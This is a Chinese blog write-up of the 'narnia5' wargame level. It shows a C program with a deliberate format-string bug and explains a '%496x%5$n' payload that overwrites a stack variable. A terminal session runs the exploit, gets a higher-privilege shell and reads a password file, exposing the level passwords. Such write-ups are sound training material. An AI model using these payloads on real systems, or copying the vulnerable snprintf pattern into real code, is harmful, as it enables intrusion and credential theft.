narnia5

原創 shuimuyq 2020-06-28 19:11 
/** narnia5.c */

/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char **argv){
	int i = 1;
	char buffer[64];

	snprintf(buffer, sizeof buffer, argv[1]);
	buffer[sizeof (buffer) - 1] = 0;
	printf("Change i's value from 1 -> 500. ");

	if(i==500){
		printf("GOOD\n");
		system("/bin/sh");
	}

	printf("No way...let me give you a hint!\n");
	printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
	printf ("i = %d (%p)\n", i, &i);
	return 0;
}



棧環境



格式化漏洞,在調用snprintf之前棧環境如上圖所示,

第一個參數爲buffer的地址 這裏爲0xffffd01c

第二個參數爲buffer的長度 這裏爲0x40 既64字節

第三個參數爲格式化串的地址 這裏爲0xffffd2f5

我們輸入的格式化串爲 python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'

本來按照snprintf的格式, 格式化串後面應該帶兩個參數的, 一個是整型值, 對應%496x, 另一個是指向整型值的指針,對應%5$n

這樣就可以解釋爲: 把i的地址0xffffd5cc輸入到buffer中, 把圖中argument 1的值以16進制的形式輸出,並且補足496字節,這樣snprintf就輸出了500字節

雖然只有64字節填入buffer中, 並且把snprintf輸出的總字節數,既500寫入到第五個argument指針指向的值處,第五個argument就是buffer的首地址

內容是i的地址, 最終就是把i的值改爲500



root@today:~# ssh [email protected]

[email protected]'s password: faimahchiy

narnia5@melinda:~$ cd /tmp/shadowcoder5

narnia5@melinda:/tmp/shadowcoder5$ ls
narnia5  narnia5.c  sleep.sh

narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xff\xff\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [����                            �] (34)
i = 1 (0xffffd5cc)

narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. GOOD
$ whoami
narnia6
$ cat /etc/narnia_pass/narnia6
neezocaeng
$


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

behemoth - 00

#include <stdio.h> #include <unistd.h> #include <string.h> int main(int argc, char *argv[]) { char pw[64]; char key[

shuimuyq 2020-06-28 19:11:37

narnia7

/** narnia7.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of

shuimuyq 2020-06-28 19:11:37

narnia2

/** narnia2.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of

shuimuyq 2020-06-28 19:11:37

narnia1

/** narnia1.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of

shuimuyq 2020-06-28 19:11:37

narnia0

/* narnia0.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of t

shuimuyq 2020-06-28 19:11:37

behemoth - 03

#include <stdio.h> int main(int argc, char *argv[]) { char buf[200]; printf("Identify yourself: "); fgets(buf, 20

shuimuyq 2020-06-28 19:11:27

behemoth - 01

#include <stdio.h> int main(int argc, char *argv[]) { char buf[64]; printf("Password: "); gets(buf); puts("Auth

shuimuyq 2020-06-28 19:11:27

behemoth - 05

#include <string.h> #include <stdlib.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include

shuimuyq 2020-06-28 19:11:27

narnia6

shuimuyq 2020-02-24 22:33:09

narnia3

shuimuyq 2020-02-24 22:33:09

behemoth - 02

shuimuyq 2020-02-24 22:33:09

narnia4

shuimuyq 2020-02-24 22:33:09

behemoth - 04

shuimuyq 2020-02-24 22:33:09

narnia8

shuimuyq 2020-02-24 22:33:09

behemoth - 00

#include <stdio.h> #include <unistd.h> #include <string.h> int main(int argc, char *argv[]) { char pw[64]; char key[

shuimuyq 2020-06-28 19:11:37